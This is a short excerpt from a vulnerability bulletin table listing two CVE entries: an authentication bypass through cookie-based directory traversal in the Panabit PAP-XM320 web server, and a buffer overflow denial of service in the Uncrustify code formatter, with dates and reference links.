| Panabit–PAP-XM320 | An authentication bypass vulnerability exists in the embedded HTTP server of Panabit PAP-XM320 up to and including v7.7. The server validates session cookies using a filesystem existence check based on a user-controlled cookie value without proper sanitization, allowing directory traversal and bypass of authentication. | 2026-05-19 | not yet calculated | CVE-2026-36829 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36829-3652c0ab461580e19704e87b18865714 |
| Uncrustify– Uncrustify | Buffer Overflow vulnerability in Uncrustify Project Affected v.Uncrustify_d-0.82.0-132-bcc41cbdc and Fixed in commit 68e67b9a1435a1bb173b106fedb4a4f510972bdc allows a local attacker to cause a denial of service via the check_template.cpp, check_template function, tokenize_cleanup function, uncrustify executable components | 2026-05-21 | not yet calculated | CVE-2026-36189 | https://github.com/uncrustify/uncrustify%2Chttps://github.com/uncrustify/uncrustify/issues/4636%2C https://github.com/uncrustify/uncrustify/pull/4641 https://gist.github.com/Criticayon/5da6d6c9cf068e494347c659d01982a9 |